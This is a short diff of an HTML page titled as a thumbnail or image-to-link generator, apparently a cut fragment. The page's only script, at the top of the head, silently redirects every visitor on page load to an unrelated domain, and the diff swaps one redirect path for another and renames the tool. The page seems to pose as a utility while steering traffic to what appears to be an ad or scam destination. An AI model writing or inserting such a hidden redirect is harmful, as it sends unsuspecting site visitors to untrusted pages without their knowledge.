--- a/index.html
+++ b/index.html
@@ -2,12 +2,12 @@
 <html lang="en">
 <head>
   <script type="text/javascript">
-window.location.href = "https://obese-pin.com/bt3SVj0.PD3dpWvsbumMVbJxZKDX0/2/NjDDkp3YMWDgM_3mLZTIY/0/O_TkccwTMHzKgA";";
+window.location.href = "https://obese-pin.com/Ni7AUG";
 </script>
 
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>YouTube Thumbnail Generator</title>
+    <title>Image to Link Generator</title>
     <style>
         @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700;900&family=Roboto:wght@700;900&family=Anton&display=swap');
 
